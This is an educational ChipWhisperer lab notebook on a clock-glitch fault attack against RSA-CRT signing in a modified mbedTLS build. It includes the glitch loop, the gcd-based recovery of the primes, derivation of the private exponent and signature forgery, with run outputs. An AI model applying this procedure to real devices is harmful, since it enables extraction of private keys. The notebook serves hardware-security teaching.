# Fault Attack on RSA

## Acknowledgements

This attack is was originally detailed in a [1997 paper by Boneh, Demillo, and Lipton](https://www.researchgate.net/publication/2409434_On_the_Importance_of_Checking_Computations). This tutorial draws heavily from a blog post by David Wong, which you can find [here](https://www.cryptologie.net/article/371/fault-attacks-on-rsas-signatures/).

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *So far, we've seen how clock and voltage glitches can be used to disrupt a microcontroller or FPGA, potentially changing the execution path. We've also seen that, in the case of AES, if we disrupt the calculation in a certian spot only twice, we can easily recover a quarter of the key bytes.*

*In this lab, we'll explore an attack on RSA, more specifically an RSA optimization, that can recover the entire key with a single fault.*

**LEARNING OUTCOMES:**

* Understanding conditions for the fault
* Recovering an RSA private key from a faulty signature

## Attack Theory

The theory for this attack is a bit simpler than the one for AES, so we'll take you through it here instead of putting it in another notebook. If you don't know, RSA is an asymmetric cryptographic algorithm, meaning it has a public and private key, with one being used for encryption and the other for decryption. It can be used in both a public encryption/private decryption configuration and a private encryption/public decryption situation. We'll be attacking the latter case. Let's assume that the target is signing a message and is sending it to us so we can verify the identity of the device.

For RSA, the public key is made up of two numbers, $n$ and $e$. The private key is made up of $n$ and $d$. These numbers have some special properties:

1. $n$ is constructed as the product of 2 prime numbers, $p$ and $q$.
1. $d$ is derived from $p$, $q$, and $e$.

As a result of these properties, a few things are evident:

1. If we learn $p$ or $q$, we can derive the other prime number since $n$ is public information.
1. If we learn $p$ and $q$, we can derive $d$ since $e$ is public information.

The target can encrypt/sign a message with the following equation ($s$ is the signature and $m$ is the message):

$$s = m^d({mod}\space n)$$

And we can decrypt/verify the message with the following equation:

$$s^e = m(mod\space n)$$

One issue with RSA is that it's very slow - these equations are simple, but they use massive numbers; if the numbers used are too small, it's trivial for a computer to factor $n$ into $p$ and $q$. $n$ for the firmware we're attacking is 1024 bits long, which is on the smaller size of secure keys at this point. This encryption/signing operation is especially slow.

An important property of the signature verification equation is that the following is also true:

$$(m - s^e)(mod\space n) = 0$$

aka $(m - s^e)$ is divisible by $n$. It follows that $(m - s^e)$ is divisible by $p$ and $q$ as well.

## The Chinese Remainder Theorem (CRT)

To help speed up the encryption, an optimization known as the Chinese Remainder Theorem (CRT) can be used. This theorem allows us derive two new exponents, $d_p$ and $d_q$, which are much smaller than $d$. We can then replace

$$s = m^d({mod}\space n)$$

with two equations

$$s_1 = m^{d_p}(mod\ p) \\
s_2 = m^{d_q}(mod\ q)$$

$s$ is then:

$$i_q = q^{-1}mod\ p \\
s = s_2 + q(i_q(s_1 - s_2)mod\ p)
$$

$s_1$ and $s_2$ can be combined into $s$ via CRT. Even though there's two modular exponentiations, this is still much faster since $d_p$ and $d_q$ are much smaller than $d$ and $p$ and $q$ are much smaller than $n$. This is the optimization that our target, which is using a slightly modified version of MBEDTLS (more on that in a bit), makes.

## Inserting a Fault

Suppose that instead of everything going smoothly as above, a fault happens during the calculation of $s_2$, turning it into $s'_2$. $s_1$ and $s'_2$ will then be combined into $s'$. If that happens, a couple of things will be true:

1. When we go to verify the signature, it won't work: $s'^e \neq m (mod\ n)$. Concequently, $(m - s'^e)(mod\space n) \neq 0$, so $(m - s'^e)$ is not divisible by $n$
1. Since $(m - s'^e)$ is not divisible by $n$, it cannot be divisible by both $p$ and $q$ anymore. Due to how the CRT works, it will still be divisible by $p$, but not by $q$. This can be expressed as $(m - s'^e) = pk$ for some integer $k$.  
1. We now have $(m - s'^e) = pk$ and $n = pq$. This means that we can find $p$ by computing $gcd(m-s'^e, n)$
    
Once we have $p$, we can compute $q = \frac{n}{p}$ and $d$ via the rest of the RSA key generation algorithm. 

The math is similar in the case that $s_1$ is faulted, with the only difference being that we recover $q$ at the end instead of $p$.

## Communicating with the Target

With the math out of the way, we can get to attacking the target:

In [8]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
# WRITE YOUR OWN HOME PATH:
CW_PATH = '/tp/xm2cyse/xm2cyse550/chipwhisperer/' 

In [9]:
%%bash -s "$CW_PATH" "$PLATFORM"
cd $1hardware/victims/firmware/simpleserial-rsa
make PLATFORM=$2 CRYPTO_TARGET=MBEDTLS CRYPTO_OPTIONS=RSA OPT=2

SS_VER set to SS_VER_1_1
SS_VER set to SS_VER_1_1
SS_VER set to SS_VER_1_1
SS_VER set to SS_VER_1_1
mkdir -p .dep
SS_VER set to SS_VER_1_1
SS_VER set to SS_VER_1_1
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:9-2019-q4-0ubuntu1) 9.2.1 20191025 (release) [ARM/arm-9-branch revision 277599]
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

mkdir -p objdir-CWLITEARM 
.
Compiling:
-en     simpleserial-rsa.c ...
-e Done!
.
Compiling:
-en     simpleserial-rsa-xmega.c ...
-e Done!
.
Compiling:
-en     simpleserial-rsa-arm.c ...


simpleserial-rsa-arm.c: In function 'get_pt':
simpleserial-rsa-arm.c:412:1: warning: control reaches end of non-void function [-Wreturn-type]
  412 | }
      | ^


-e Done!
.
Compiling:
-en     .././simpleserial/simpleserial.c ...
-e Done!
.
Compiling:
-en     .././hal/stm32f3/stm32f3_hal.c ...
-e Done!
.
Compiling:
-en     .././hal/stm32f3/stm32f3_hal_lowlevel.c ...
-e Done!
.
Compiling:
-en     .././hal/stm32f3/stm32f3_sysmem.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/rsa.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/bignum.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/md.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/md5.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/md_wrap.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/sha1.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/sha256.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/sha512.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/ripemd160.c ...
-e Done!
.
Compiling:
-en     .././crypto/mbedtls//library/oid.c ...
-e Done!
.
Assemb

make[1]: Warning: File '.dep/bignum.o.d' has modification time 232 s in the future


Size after:
   text	   data	    bss	    dec	    hex	filename
  22216	    116	  18340	  40672	   9ee0	simpleserial-rsa-CWLITEARM.elf
+--------------------------------------------------------
+ Default target does full rebuild each time.
+ Specify buildtarget == allquick == to avoid full rebuild
+--------------------------------------------------------
+--------------------------------------------------------
+ Built for platform CW-Lite Arm \(STM32F3\) with:
+ CRYPTO_TARGET = MBEDTLS
+ CRYPTO_OPTIONS = RSA
+--------------------------------------------------------


make[1]: warning:  Clock skew detected.  Your build may be incomplete.


In [10]:
# %run "../../Setup_Scripts/Setup_Generic.ipynb"
setup_script = CW_PATH  + "jupyter/Setup_Scripts/Setup_Generic.ipynb"
%run $setup_script

(ChipWhisperer NAEUSB WARNING|File naeusb.py:799) Your firmware (0.23) is outdated - latest is 0.65 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


INFO: Found ChipWhisperer😍
scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 7612748                   to 30007001                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 0                         to 372363281                
scope.clock.adc_rate                     changed from 0.0                       to 372363281.0       

In [11]:
import time
fw_path = CW_PATH  + "hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
time.sleep(1)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 22387 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 22387 bytes


This target is using the simpleserial protocol, but the full signature is too big to read back in a single command. This means we instead read back the signature in 3 commands:

1. `'t'` will do the signature calculation and respond with the first 48 bytes of the signature
1. `'1'` will return the next 48 bytes of the signature
1. `'2'` will return the final 32 bytes of the signature

In [12]:
import time
scope.clock.adc_src = "clkgen_x1"
target.flush()

scope.arm()
target.simpleserial_write("t", bytearray([]))
    
ret = scope.capture()
if ret:
    print('Timeout happened during acquisition')
    
time.sleep(2)
output = target.simpleserial_read_witherrors('r', 48, timeout=10)


In [13]:
sig = None
if output['valid']:
    print(output['payload'])
    sig = output['payload']
    
print(scope.adc.trig_count)

bytearray(b'O\ty\x9fjY\x08\x1brU\x99u30\xb7\xa2D\n\xbcB`f\x01b/\xe0\xc5\x82dn2US\x03\xe1\x06*)\x89\xd9\xb4\xc2eC\x1a\xdbX\xdd')
10813434


That took a long time, probably more than 10M cycles! Let's read back the rest of the message and append it to our signature:

In [14]:
target.simpleserial_write("1", bytearray())
time.sleep(0.2)
output = target.simpleserial_read_witherrors('r', 48, timeout=10)
if output['valid']:
    sig.extend(output['payload'])

target.simpleserial_write("2", bytearray())
time.sleep(0.2)
output = target.simpleserial_read_witherrors('r', 32, timeout=10)
if output['valid']:
    sig.extend(output['payload'])
    
print(sig)

bytearray(b'O\ty\x9fjY\x08\x1brU\x99u30\xb7\xa2D\n\xbcB`f\x01b/\xe0\xc5\x82dn2US\x03\xe1\x06*)\x89\xd9\xb4\xc2eC\x1a\xdbX\xdd\x85\xbb3\xc4\xbb#z1\x1b\xc4\x0c\x12yR\x8f\xd6\xbb6\xf9OSJM\x82\x84\xa1\x8a\xb8\xe5g\x0esLU\xa6\xcc\xab_\xb5\xea\xe0+\xa3~-Vd\x8dz\x13\xbb\xf1z\x0e\x07\xd6\x07\xc0|\xbbr\xc7\xa7\xa7pv7n\x844\xcen\x13h2\xdc\x95\xdb=\x80')


In [15]:
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

Let's verify that our signature is correct and that we can verify it:

In [16]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

e = 0x10001
n = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
m = b"Hello World!"

hash_object = SHA256.new(data=m)
pub_key = RSA.construct((n, e))
signer = PKCS1_v1_5.new(pub_key) 
sig_check = signer.verify(hash_object, sig)
print(sig_check)

assert sig_check, "Failed to verify signature on device. Got: {}".format(newout)

True


Now let's setup the glitch module. Use settings here that worked for you before. Ideally, you'll have a single group of settings here - RSA is very slow (as you've seen), so trying to scan settings here would take forever!

**Hint:** If needed, reuse the characterization loop from Lab5 to find the corect parameters

In [17]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 6 # CHOOSE A SUITABLE VALUE (1..6)
scope.glitch.width = 10.15625 # CHOOSE A SUITABLE VALUE (-10..10)
scope.glitch.offset = -12.109375 # CHOOSE A SUITABLE VALUE (-40..0)
#if it does not work, try to increase the ranges  
scope.io.hs2 = "glitch"
print(scope.glitch)

clk_src     = clkgen
width       = 10.15625
width_fine  = 0
offset      = -12.109375
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 0
repeat      = 6
output      = clock_xor



Try to glitch the signature competition in order to get exploitable faults.
Remember that you need to fault only one of the two sub-computations, and when you inject faults the control flow may diverge. This means that if you want one of the signature to be correct, you should inject the fault into the second subcomputation.

You can capture a trace and look for sensible offsets. Take care to decimate as much as needed, as RSA computation is quite long!

In [19]:
from tqdm import tnrange
import time
for i in tnrange(5000000, 6000000,100000 ): #look for something kind of near the end, look at global number of cycles used earlier for computation!
    scope.glitch.ext_offset = i
    scope.adc.timeout = 3
    target.flush()
    scope.arm()
    target.simpleserial_write("t", bytearray([]))

    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')
        reboot_flush()
        time.sleep(0.5)
        continue

    time.sleep(2)
    output = target.simpleserial_read_witherrors('r', 48, timeout=100, glitch_timeout=1)
    if output['valid'] is False: # replace with invalid output detection
        print("crash", output) #we can't really do anything here - we need the full signature back
        reboot_flush()
        time.sleep(0.5)
        continue
    else:
        sig = output['payload']
        target.simpleserial_write("1", bytearray())
        time.sleep(0.1)
        output = target.simpleserial_read_witherrors('r', 48, timeout=10)
        if output['valid']:
            sig.extend(output['payload'])
        else:
            print("couldn't read 1 cmd")
            continue

        target.simpleserial_write("2", bytearray())
        time.sleep(0.1)
        output = target.simpleserial_read_witherrors('r', 32, timeout=10)
        if output['valid']:
            sig.extend(output['payload'])
        else:
            print("Couldn't read 2 cmd")
            continue
        sig_check = signer.verify(hash_object, sig)
        if sig_check is False: #detect if the calculation was messed up
            # call the faulty signature whatever you want
            # but we'll assume it's called sig for the rest of the lab
            print("Glitched!")
            sig = sig
            break
        else:
            pass # normal operation, nothing special

/tmp/ipykernel_15767/2933538362.py:3: TqdmDeprecationWarning: Please use `tqdm.notebook.trange` instead of `tqdm.tnrange`
  for i in tnrange(5000000, 6000000,100000 ): #look for something kind of near the end, look at global number of cycles used earlier for computation!


  0%|          | 0/10 [00:00<?, ?it/s]

crash {'valid': False, 'payload': None, 'full_response': '', 'rv': None}
crash {'valid': False, 'payload': None, 'full_response': '', 'rv': None}
crash {'valid': False, 'payload': None, 'full_response': '', 'rv': None}
crash {'valid': False, 'payload': None, 'full_response': '', 'rv': None}
crash {'valid': False, 'payload': None, 'full_response': '', 'rv': None}
Glitched!


## Padding the Message

We've got our glitched signature, but we've still got a little work to do. The $m$ isn't actually the message by itself. Instead, it's a PKCS#1 v1.5 padded hash of it. Luckily, this standard's fairly simple. PKCS#1 v1.5 padding looks like:

\|00\|01\|ff...\|00\|hash_prefix\|message_hash\|

Here, the ff... part is a string of ff bytes long enough to make the size of the padded message the same as N, while hash_prefix is an identifier number for the hash algorithm used on message_hash. Our message was hashed using SHA256, which has the hash prefix `3031300d060960864801650304020105000420`.

We can get our hashed message and $m$ with the following code:

In [20]:
from Crypto.Hash import SHA256
from binascii import hexlify, unhexlify

def build_message(m, n):
    sha_id = "3031300d060960864801650304020105000420"
    N_len = (len(bin(n)) - 2 + 7) // 8
    pad_len = (len(hex(n)) - 2) // 2 - 3 - len(m)//2 - len(sha_id)//2
    padded_m = "0001" + "ff" * pad_len + "00" + sha_id + m
    return padded_m

hashed_m = hexlify(hash_object.digest()).decode()
padded_m = build_message(hashed_m, n)
print(hashed_m)
print(padded_m)

7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069
0001ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d0609608648016503040201050004207f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069


## Recovering the Private Key

Now we can recover the private values by plugging them into the equations from earlier. If you can, install the gmpy2 Python library, which has much better support for big integer math like this. Otherwise, run the next block and wait for a few minutes for the calculation to finish.

You can get gmpy2 on Windows from the following link: https://pypi.org/project/gmpy2/#files. On Linux, you can install it via your package manager (python3-gmpy2 on Apt, for example).

In [21]:
import sys
!{sys.executable} -m pip install gmpy2

Defaulting to user installation because normal site-packages is not writeable
     |████████████████████████████████| 1.7 MB 4.0 MB/s eta 0:00:01
You should consider upgrading via the '/bin/python3.8 -m pip install --upgrade pip' command.


In [22]:
from math import gcd
n = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
e = 0x10001
try:
    import gmpy2
    from gmpy2 import mpz
    sig_int = mpz(int.from_bytes(sig, "big"))
    m_int = mpz(int.from_bytes(unhexlify(padded_m), "big"))
    p_test = gmpy2.gcd(m_int-sig_int**e, n) # LOOK AT ATTACK THEORY PARAGRAPH ABOVE
except (ImportError, ModuleNotFoundError) as error:
    print("gmpy2 not found, falling back to Python")
    sig_int = int.from_bytes(sig, "big")
    padded_m_int = int.from_bytes(unhexlify(padded_m), "big")
    p_test = gcd(padded_m_int-sig_int**e, n) # LOOK AT ATTACK THEORY PARAGRAPH ABOVE
    
print(hex(p_test))

0xc36d0eb7fcd285223cfb5aaba5bda3d82c01cad19ea484a87ea4377637e75500fcb2005c5c7dd6ec4ac023cda285d796c3d9e75e1efc42488bb4f1d13ac30a57


We should now have either $p$ or $q$! We can get the other prime by simply dividing $n$ by the one we have.

In [23]:
q_test = n//p_test
print(hex(q_test))

0xc000df51a7c77ae8d7c7370c1ff55b69e211c2b9e5db1ed0bf61d0d9899620f4910e4168387e3c30aa1e00c339a795088452dd96a9a5ea5d9dca68da636032af


The $d$ calculation is a bit more complicated. Here's some code to derive it from $q$, $p$, and $e$:

In [24]:
phi = (q_test - 1)*(p_test - 1)
def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

gcd, d, b = egcd(e, phi)

print(hex(d))

0x24bf6185468786fdd303083d25e64efc66ca472bc44d253102f8b4a9d3bfa75091386c0077937fe33fa3252d28855837ae1b484a8a9a45f7ee8c0c634f99e8cddf79c5ce07ee72c7f123142198164234cabb724cf78b8173b9f880fc86322407af1fedfdde2beb674ca15f3e81a1521e071513a1e85b5dfa031f21ecae91a34d


Let's sign the original message and see if we can verify it with our original verifier:

In [25]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

private_key = RSA.construct((n, e, int(d), int(p_test), int(q_test)))
private_signer = PKCS1_v1_5.new(private_key) 
new_sig = private_signer.sign(hash_object)
print(sig)

new_sig_check = signer.verify(hash_object, new_sig)
print(new_sig_check)

assert new_sig_check, "Failed to verify signature on device. Got: {}".format(newout)

bytearray(b"8J\xf4\x91}\x1d!\xe1\x8e\x86L|w\x8f\x8d8\x03t\x80l\xc6\xfc|\xf7\x89O\xb4\x0e\xc4\x0f\x13\xec\\*\'g\x85\xf1g%\xcd}e\x1d\rc\x99hb\x0f`Rfax)\xd6\xcc2,\x95\x85h-\xe5(CG0\xa7kc\x9c.\r\x85+,\xab\xd7\xc2\x7fZ\x19\x1c\xfaq\xb9\xb6\xe7N\x91\xa1\x06z\xc2\x88 o\x97\xf5y\xca\xd3\x96\xb9o|+R\x88\xf4,\xd0\x07\xe0\x180H\xec\xd1\xf2\x97:QF(\xf1")
True


Now that you've seen the attack work, you might want to try doing the fault in the other half of the RSA calculation to see if you can get the other prime number back.

## Caveats to the Attack

The crypto implementation we're attack isn't actually vulnerable to this attack without some additional glitching. This is because it verifies the signature is valid before sending it off. With a more complicated glitch setup, we could try glitching past it, but this is outside the scope of this lab. Some ideas include modifying the ChipWhisperer FPGA code to generate a second glitch, using a second ChipWhisperer (easiest if you were voltage glitching), and using a second trigger and trying to rearm between the two signature encryptions. You might even be able to increase the repeat and glitch near the end of the second encryption algorithm to glitch past both.

Instead though, we copied some of the functions and commented out the following signature check:

```C
    /* Compare in constant time just in case */
    for( diff = 0, i = 0; i < ctx->len; i++ )
        diff |= verif[i] ^ sig[i];
    diff_no_optimize = diff;

    if( diff_no_optimize != 0 )
    {
        ret = MBEDTLS_ERR_RSA_PRIVATE_FAILED;
        goto cleanup;
    }
```